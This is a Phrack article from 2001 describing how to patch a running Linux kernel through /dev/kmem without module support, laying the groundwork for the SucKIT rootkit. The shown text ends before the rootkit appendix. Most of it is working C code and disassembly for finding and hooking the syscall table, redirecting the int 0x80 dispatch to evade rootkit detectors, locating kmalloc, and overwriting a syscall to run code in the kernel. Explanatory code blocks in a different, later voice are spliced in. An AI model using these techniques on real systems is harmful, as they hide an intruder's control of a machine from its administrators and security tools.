Linux on-the-fly kernel patching without LKM
==Phrack Inc.==
Volume 0x0b, Issue 0x3a, Phile #0x07 of 0x0e
|=----------=[ Linux on-the-fly kernel patching without LKM ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ sd <sd@sf.cz>, devik <devik@cdi.cz> ]=---------------=|
|=----------------------=[ December 12th 2001 ]=-------------------------=|
--[ Contents
1 - Introduction
2 - /dev/kmem is our friend
3 - Replacing kernel syscalls, sys_call_table[]
3.1 - How to get sys_call_table[] without LKM?
3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch
4 - Allocating kernel space without help of LKM support
4.1 - Searching for kmalloc() using LKM support
4.2 - Pattern search of kmalloc()
4.3 - The GFP_KERNEL value
4.4 - Overwriting a syscall
5 - What you should take care of
6 - Possible solutions
7 - Conclusion
8 - References
9 - Appendix: SucKIT: The implementation
--[ 1 - Introduction
In the beginning, we must thank Silvio Cesare, who developed the
technique of kernel patching a long time ago; most of the ideas were
stolen from him.
In this paper, we will discuss a way of abusing the Linux kernel
(syscalls mostly) without the help of module support or System.map at all,
so we assume that the reader has a clue about what an LKM is, how an LKM
is loaded into the kernel, etc. If you are not sure, look at some
documentation (for example [1], [2], [3]).
Imagine a poor man who needs to change some interesting Linux syscall,
and LKM support is not compiled in. Imagine he has a box and he got root,
but the admin is so paranoid that he (or tripwire) would spot the poor
man's patched sshd, and the box has no gcc/libs/headers needed for
compiling his favourite LKM rootkit. So here are some solutions, step by
step, and as an appendix, a full-featured linux-ia32 rootkit, an
example/tool that implements all the techniques described here.
Most of the things described here (such as syscalls, memory addressing
schemes ... and the code too) work only on the ia32 architecture. If
anyone has investigated other architectures, please contact us.
--[ 2 - /dev/kmem is our friend
"Mem is a character device file that is an image of the main memory of
the computer. It may be used, for example, to examine (and even patch)
the system."
-- from the Linux 'mem' man page
For full and complete documentation about run-time kernel patching, take
a look at Silvio's excellent article on this subject [2].
In short:
Everything we do in this paper with kernel space is done using the
standard Linux device /dev/kmem. Since this device is usually read/write
for root only, you must be root too if you want to abuse it.
Note that changing the /dev/kmem permissions to gain access is not
sufficient. After the VFS allows access to /dev/kmem, there is a second
check in drivers/char/mem.c for capable(CAP_SYS_RAWIO) of the process.
We should also note that there is another device, /dev/mem. It is
physical memory, addressed without VM translation. It might be possible to
use it if we knew the page directory location. We didn't investigate this
possibility.
Selecting an address is done with lseek(), reading with read() and
writing with write() ... simple.
There are some helpful functions for working with kernel stuff:
/* read data from kmem */
static inline int rkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (read(fd, buf, size) != size) return 0;
    return size;
}

/* write data to kmem */
static inline int wkm(int fd, int offset, void *buf, int size)
{
    if (lseek(fd, offset, SEEK_SET) != offset) return 0;
    if (write(fd, buf, size) != size) return 0;
    return size;
}

/* read one ulong (a pointer on ia32) from kmem */
static inline int rkml(int fd, int offset, ulong *buf)
{
    return rkm(fd, offset, buf, sizeof(ulong));
}

/* write one ulong to kmem */
static inline int wkml(int fd, int offset, ulong buf)
{
    return wkm(fd, offset, &buf, sizeof(ulong));
}
--[ 3 - Replacing kernel syscalls, sys_call_table[]
As we all know, syscalls are the lowest level of system functions (from
the viewpoint of userspace) in Linux, so we'll be interested mostly in them.
Syscalls are grouped together in one big table (sct). It is just a
one-dimensional array of 256 ulongs (= pointers, on the ia32 architecture),
where indexing the array by a syscall number gives us the entrypoint of
that syscall. That's it.
Example pseudocode:
/* as everywhere, "Hello world" is good for beginners */

/* our saved original syscall */
int (*old_write) (int, char *, int);

/* new syscall handler */
int new_write(int fd, char *buf, int count)
{
    if (fd == 1) {      /* stdout? */
        old_write(fd, "Hello world!\n", 13);
        return count;
    } else {
        return old_write(fd, buf, count);
    }
}

old_write = (void *) sys_call_table[__NR_write];  /* save old */
sys_call_table[__NR_write] = (ulong) new_write;   /* set up new one */

/* Err... there should be better things to do instead of fucking up the
   console with "Hello worlds" */
This is the classic scenario of various LKM rootkits (see paragraph 7)
and tty sniffers/hijackers (e.g. halflife's one [4]), where it is
guaranteed that we can import sys_call_table[] and manipulate it in a
correct manner, i.e. it is simply "imported" by /sbin/insmod
[ using create_module() / init_module() ].
Uhh, let's stop talking about nothing; we think this is clear enough for
everybody.
--[ 3.1 - How to get sys_call_table[] without LKM?
First, note that the Linux kernel _does not keep_ any kind of information
about its symbols when there is no LKM support compiled in. It is rather
a clever decision, because why would anyone need it without LKM? For
debugging? You have System.map instead. Well, WE need it. With LKM support
there are symbols intended to be imported into LKMs (in their own special
linker section), but we said without LKM, right?
As far as we know, the most elegant way to obtain sys_call_table[] is:
#define _GNU_SOURCE             /* for memmem() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

struct {
    unsigned short limit;
    unsigned int base;
} __attribute__ ((packed)) idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__ ((packed)) idt;

int kmem;

void readkmem(void *m, unsigned off, int sz)
{
    if (lseek(kmem, off, SEEK_SET) != off) {
        perror("kmem lseek");
        exit(2);
    }
    if (read(kmem, m, sz) != sz) {
        perror("kmem read");
        exit(2);
    }
}

#define CALLOFF 100     /* we'll read the first 100 bytes of int $0x80 */

int main(void)
{
    unsigned sys_call_off;
    unsigned sct;
    char sc_asm[CALLOFF], *p;

    /* well, let's read IDTR */
    asm ("sidt %0" : "=m" (idtr));
    printf("idtr base at 0x%X\n", (int)idtr.base);

    /* now we will open kmem */
    kmem = open("/dev/kmem", O_RDONLY);
    if (kmem < 0) return 1;

    /* read in the IDT entry for vector 0x80 (syscall) */
    readkmem(&idt, idtr.base + 8*0x80, sizeof(idt));
    sys_call_off = (idt.off2 << 16) | idt.off1;
    printf("idt80: flags=%X sel=%X off=%X\n",
           (unsigned)idt.flags, (unsigned)idt.sel, sys_call_off);

    /* we have the syscall routine address now, look for the syscall
       table dispatch (indirect call) */
    readkmem(sc_asm, sys_call_off, CALLOFF);
    p = (char *)memmem(sc_asm, CALLOFF, "\xff\x14\x85", 3);
    if (p) {
        sct = *(unsigned *)(p + 3);
        printf("sys_call_table at 0x%x, call dispatch at 0x%x\n",
               sct, sys_call_off + (unsigned)(p - sc_asm));
    }
    close(kmem);
    return 0;
}
How does it work? The sidt instruction "asks the processor" for the
interrupt descriptor table register [asm ("sidt %0" : "=m" (idtr));].
From this structure we get the base address of the IDT, and since every
descriptor is 8 bytes long, the descriptor of int $0x80 lies at
base + 8*0x80 [readkmem (&idt,idtr.base+8*0x80,sizeof(idt));].
From this descriptor we can compute the address of int $0x80's entrypoint
[sys_call_off = (idt.off2 << 16) | idt.off1;]
Good, we know where int $0x80 begins, but that is not our beloved
sys_call_table[]. Let's take a look at the int $0x80 entrypoint:
[sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux
(no debugging symbols found)...(gdb) disass system_call
Dump of assembler code for function system_call:
0xc0106bc8 <system_call>: push %eax
0xc0106bc9 <system_call+1>: cld
0xc0106bca <system_call+2>: push %es
0xc0106bcb <system_call+3>: push %ds
0xc0106bcc <system_call+4>: push %eax
0xc0106bcd <system_call+5>: push %ebp
0xc0106bce <system_call+6>: push %edi
0xc0106bcf <system_call+7>: push %esi
0xc0106bd0 <system_call+8>: push %edx
0xc0106bd1 <system_call+9>: push %ecx
0xc0106bd2 <system_call+10>: push %ebx
0xc0106bd3 <system_call+11>: mov $0x18,%edx
0xc0106bd8 <system_call+16>: mov %edx,%ds
0xc0106bda <system_call+18>: mov %edx,%es
0xc0106bdc <system_call+20>: mov $0xffffe000,%ebx
0xc0106be1 <system_call+25>: and %esp,%ebx
0xc0106be3 <system_call+27>: cmp $0x100,%eax
0xc0106be8 <system_call+32>: jae 0xc0106c75 <badsys>
0xc0106bee <system_call+38>: testb $0x2,0x18(%ebx)
0xc0106bf2 <system_call+42>: jne 0xc0106c48 <tracesys>
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4) <-- that's it
0xc0106bfb <system_call+51>: mov %eax,0x18(%esp,1)
0xc0106bff <system_call+55>: nop
End of assembler dump.
(gdb) print &sys_call_table
$1 = (<data variable, no debug info> *) 0xc01e0f18 <-- see? it's the same
(gdb) x/xw (system_call+44)
0xc0106bf4 <system_call+44>: 0x188514ff <-- opcode (little endian)
(gdb)
In short, near the beginning of the int $0x80 entrypoint there is a
'call sys_call_table(,eax,4)' instruction. Because this indirect call does
not vary between kernel versions (it is the same from 2.0.10 to 2.4.10),
it is relatively safe to search just for the pattern of
'call <something>(,eax,4)':
opcode = 0xff 0x14 0x85 0x<address_of_table>
[memmem (sc_asm,CALLOFF,"\xff\x14\x85",3);]
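Here is a standalone sketch of this search, for illustration only. It scans an ordinary byte buffer (standing in for the 100 bytes read from kmem) for ff 14 85 and decodes the next four bytes as a little-endian address. Unlike the memmem() version, it does not need _GNU_SOURCE. It also rejects a match whose displacement would run past the end of the buffer. The name find_call_table() is ours and is not from the original tool.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Look for the ia32 encoding of 'call *disp32(,%eax,4)' (ff 14 85) in buf.
 * On success, return the little-endian disp32 that follows the opcode
 * bytes (the address of the table being indexed) and, if pos is not NULL,
 * store the index of the 0xff byte there. Return 0 if there is no match
 * with all four displacement bytes inside the buffer. */
static uint32_t find_call_table(const uint8_t *buf, size_t len, size_t *pos)
{
    assert(buf != NULL || len == 0);
    for (size_t i = 0; i + 7 <= len; i++) {
        if (buf[i] != 0xff || buf[i + 1] != 0x14 || buf[i + 2] != 0x85)
            continue;
        if (pos != NULL)
            *pos = i;
        return (uint32_t)buf[i + 3]
             | ((uint32_t)buf[i + 4] << 8)
             | ((uint32_t)buf[i + 5] << 16)
             | ((uint32_t)buf[i + 6] << 24);
    }
    return 0;
}
```

As an example, take the bytes f6 43 18 02 75 54 ff 14 85 18 0f 1e c0 89 44 24 18, which we hand-assembled to match system_call+38 through system_call+55 in the listing above. The match is at index 6 and decodes to 0xc01e0f18, the same address gdb reports for sys_call_table.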
Being paranoid, one could do a more robust hack: simply redirect the whole
int $0x80 handler in the IDT to our fake handler and intercept interesting
calls there. It is a bit more complicated, as we would have to handle
reentrancy ...
At this point, we know where sys_call_table[] is and we can change the
address of some syscalls:
Pseudocode:
readkmem(&old_write, sct + __NR_write * 4, 4); /* save old */
writekmem(&new_write, sct + __NR_write * 4, 4); /* set new */
--[ 3.2 - Redirecting int $0x80 call sys_call_table[eax] dispatch
While writing this article, we found some "rootkit detectors"
on Packetstorm/Freshmeat. They are able to detect the fact that
something is wrong with an LKM, the syscall table or other kernel
stuff... fortunately, most of them are too stupid and can simply be
fooled by the trick introduced in [6] by SpaceWalker:
Pseudocode:
ulong sct = addr of sys_call_table[]
char *p = ptr to int 0x80's call sct(,eax,4) - dispatch
ulong nsct[256] = new syscall table with modified entries
readkmem(nsct, sct, 1024); /* read old */
old_write = nsct[__NR_write];
nsct[__NR_write] = new_write;
/* replace dispatch to our new sct */
writekmem((ulong) p+3, nsct, 4);
/* Note that this code can never work, because you can't
   redirect something kernel-related to userspace, such as
   sct[] in this case */
Background:
We create a copy of the original sys_call_table[] [readkmem(nsct, sct,
1024);], then we modify the entries we're interested in [old_write =
nsct[__NR_write]; nsct[__NR_write] = new_write;] and then change _only_
the address <something> in the call <something>(,eax,4):
0xc0106bf4 <system_call+44>: call *0xc01e0f18(,%eax,4)
                                   ~~~~|~~~~~
                                       |__ Here will be the address of
                                           _our_ sct[]
LKM detectors (which do not check the consistency of int $0x80) won't see
anything: sys_call_table[] is the same, but int $0x80 uses our implanted
table.
--[ 4 - Allocating kernel space without help of LKM support
The next thing we need is a memory page above the 0xc0000000
(or 0x80000000) address.
The 0xc0000000 value is the demarcation point between user and kernel
memory; user processes have no access above this limit. Keep in mind
that this value is not fixed and may differ, so it is a good idea
to figure out the limit on the fly (from int $0x80's entrypoint).
Well, how do we get our page above the limit? Let's take a look at how the
regular kernel LKM support does it (/usr/src/linux/kernel/module.c):
...
void inter_module_register(const char *im_name, struct module *owner,
                           const void *userdata)
{
    struct list_head *tmp;
    struct inter_module_entry *ime, *ime_new;

    if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
        /* Overloaded kernel, not fatal */
        ...
As we expected, they use kmalloc(size, GFP_KERNEL)! But we can't use
kmalloc() yet because:
- We don't know the address of kmalloc() [ paragraph 4.1, 4.2 ]
- We don't know the value of GFP_KERNEL [ paragraph 4.3 ]
- We can't call kmalloc() from user-space [ paragraph 4.4 ]
--[ 4.1 - Searching for kmalloc() using LKM support
If we can use LKM support:
/* kmalloc() lookup */
/* simplest & safest way, but only if LKM support is there */
ulong get_sym(char *n)
{
    struct kernel_sym tab[MAX_SYMS];
    int numsyms;
    int i;

    numsyms = get_kernel_syms(NULL);
    if (numsyms > MAX_SYMS || numsyms < 0) return 0;
    get_kernel_syms(tab);
    for (i = 0; i < numsyms; i++) {
        if (!strncmp(n, tab[i].name, strlen(n)))
            return tab[i].value;
    }
    return 0;
}

ulong get_kma(ulong pgoff)
{
    ulong ret;

    ret = get_sym("kmalloc");
    if (ret) return ret;
    return 0;
}
We leave this without comments.
--[ 4.2 - Pattern search of kmalloc()
But if LKM support is not there, we're getting into trouble. The solution
is quite dirty, and not so good by the way, but it seems to work.
We'll walk through the kernel's .text section and look for patterns
such as:
    push GFP_KERNEL     <something between 0-0xffff>
    push size           <something between 0-0x1ffff>
    call kmalloc
All the info will be gathered into a table, and the call target that
occurs most often (counted together with its GFP argument) will be taken
as our kmalloc(). Here is the code:
/* kmalloc() lookup */
#define RNUM 1024
ulong get_kma(ulong pgoff)
{
    struct { uint a, f, cnt; } rtab[RNUM], *t;
    uint i, a, j, push1 = 0, push2 = 0;
    uint found = 0, total = 0;
    uchar buf[0x10010], *p;   /* 64 KB window plus slack for insns crossing its end */
    int kmem;
    ulong ret;

    /* uhh, before we try to brute something, attempt to do things
       in the *right* way ;)) */
    ret = get_sym("kmalloc");
    if (ret) return ret;

    /* humm, no way ;)) */
    kmem = open(KMEM_FILE, O_RDONLY, 0);
    if (kmem < 0) return 0;

    for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
         i += 0x10000) {
        if (!loc_rkm(kmem, buf, i, sizeof(buf))) {
            close(kmem);
            return 0;
        }
        /* loop over memory block looking for pushes and calls */
        for (p = buf; p < buf + 0x10000;) {
            switch (*p++) {
            case 0x68:                  /* push imm32 */
                push1 = push2;
                push2 = *(unsigned *)p;
                p += 4;
                continue;
            case 0x6a:                  /* push imm8 */
                push1 = push2;
                push2 = *p++;
                continue;
            case 0xe8:                  /* call rel32 */
                if (push1 && push2 &&
                    push1 <= 0xffff &&
                    push2 <= 0x1ffff) break;
                /* fall through */
            default:
                push1 = push2 = 0;
                continue;
            }
            /* we have a push1/push2/call sequence; get the call target */
            a = *(unsigned *) p + i + (p - buf) + 4;
            p += 4;
            total++;
            /* find in table */
            for (j = 0, t = rtab; j < found; j++, t++)
                if (t->a == a && t->f == push1) break;
            if (j < found)
                t->cnt++;
            else if (found >= RNUM) {
                close(kmem);
                return 0;
            } else {
                found++;
                t->a = a;
                t->f = push1;
                t->cnt = 1;
            }
            push1 = push2 = 0;
        } /* for (p = buf; ... */
    } /* for (i = (pgoff + 0x100000) ...*/
    close(kmem);

    t = NULL;
    for (j = 0; j < found; j++)     /* find a winner */
        if (!t || rtab[j].cnt > t->cnt) t = rtab + j;
    if (t) return t->a;
    return 0;
}
The code above is a simple state machine, and it doesn't bother itself with
potentially different asm code layouts (when you use some exotic GCC
options). It could be extended to understand different code patterns (see
the switch statement) and made more accurate by checking the GFP value in
the PUSHes against known patterns (see the paragraph below).
The accuracy of this code is about 80% (i.e. 80% of the time it points to
kmalloc, 20% to some junk) and it seems to work OK on 2.2.1 through 2.4.13.
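The target computation a = *(unsigned *) p + i + (p - buf) + 4 is the ordinary ia32 rule for call rel32 (opcode 0xe8). The signed 32-bit displacement is added to the address of the next instruction. Since p already points past the 0xe8 byte, i + (p - buf) is the kernel address of the displacement field, and + 4 skips over it. Below is a small sketch of the same rule, measured from the opcode byte instead, so the full instruction length of 5 is added. The function name call_rel32_target() is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Target of an ia32 'call rel32'. insn points at the 0xe8 opcode byte and
 * insn_addr is the (kernel) address that byte was read from. The
 * displacement is relative to the end of the 5-byte instruction. */
static uint32_t call_rel32_target(const uint8_t *insn, uint32_t insn_addr)
{
    uint32_t rel;

    assert(insn[0] == 0xe8);
    rel = (uint32_t)insn[1]
        | ((uint32_t)insn[2] << 8)
        | ((uint32_t)insn[3] << 16)
        | ((uint32_t)insn[4] << 24);
    /* unsigned wrap-around takes care of negative (backward) displacements */
    return insn_addr + 5 + rel;
}
```

For a call at 0xc0100000 encoded as e8 34 12 00 00, the target is 0xc0101239. With e8 f0 ff ff ff (a displacement of -16), it is 0xc00ffff5, because 32-bit unsigned wrap-around performs the subtraction.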
--[ 4.3 - The GFP_KERNEL value
The next problem we hit when using kmalloc() is that the value of
GFP_KERNEL varies between kernel series, but we can get around it
with the help of uname():
+----------------+------------------+
| kernel version | GFP_KERNEL value |
+----------------+------------------+
| 1.0.x .. 2.4.5 | 0x3              |
+----------------+------------------+
| 2.4.6 .. 2.4.x | 0x1f0            |
+----------------+------------------+
Note that there are some troubles with 2.4.7-2.4.9 kernels, which
sometimes crash due to a bad GFP_KERNEL, simply because the table
above is not exact; it only shows values we CAN use.
The code:
#define NEW_GFP 0x1f0
#define OLD_GFP 0x3

/* same layout as the struct utsname filled in by the uname() syscall */
struct un {
    char sysname[65];
    char nodename[65];
    char release[65];
    char version[65];
    char machine[65];
    char domainname[65];
};

int get_gfp()
{
    struct un s;

    uname(&s);
    /* "2.4.6" .. "2.4.9", or any two-digit 2.4 patch level ("2.4.1x" ...) */
    if ((s.release[0] == '2') && (s.release[2] == '4') &&
        (s.release[4] >= '6' ||
         (s.release[5] >= '0' && s.release[5] <= '9'))) {
        return NEW_GFP;
    }
    return OLD_GFP;
}
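The character-index test above depends on the exact layout of the release string. Below is a sketch of the same decision made by parsing the numbers with sscanf(), following the version table above. gfp_for_release() is a hypothetical helper. Like the table, it says nothing reliable about the troublesome 2.4.7-2.4.9 range.

```c
#include <assert.h>
#include <stdio.h>

#define NEW_GFP 0x1f0
#define OLD_GFP 0x3

/* Pick a GFP_KERNEL value from a uname() release string such as
 * "2.4.10-ac3": 2.4.6 and later 2.4 kernels get NEW_GFP, anything older
 * gets OLD_GFP. Strings that don't parse as x.y.z fall back to OLD_GFP. */
static int gfp_for_release(const char *release)
{
    int major, minor, patch;

    assert(release != NULL);
    if (sscanf(release, "%d.%d.%d", &major, &minor, &patch) != 3)
        return OLD_GFP;
    if (major == 2 && minor == 4 && patch >= 6)
        return NEW_GFP;
    return OLD_GFP;
}
```

For instance, "2.4.10-ac3" and "2.4.13" give 0x1f0, while "2.4.5" and "2.2.19" give 0x3. Comparing integers instead of characters makes it easy to add further ranges if the table grows.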
--[ 4.4 - Overwriting a syscall
As we mentioned above, we can't call kmalloc() from user space directly;
the solution is Silvio's trick [2] of replacing a syscall:
1. Get address of some syscall
(IDT -> int 0x80 -> sys_call_table)
2. Create a small routine which will call kmalloc() and return
pointer to allocated page
3. Save sizeof(our_routine) bytes of some syscall
4. Overwrite code of some syscall by our routine
5. Call this syscall from userspace through int $0x80, so
our routine will operate in kernel context and
can call kmalloc() for us passing out the
address of allocated memory as return value.
6. Restore code of some syscall with saved bytes (in step 3.)
our_routine may look something like this:
struct kma_struc {
    ulong (*kmalloc) (uint, int);
    int size;
    int flags;
    ulong mem;
} __attribute__ ((packed));

int our_routine(struct kma_struc *k)
{
    k->mem = k->kmalloc(k->size, k->flags);
    return 0;
}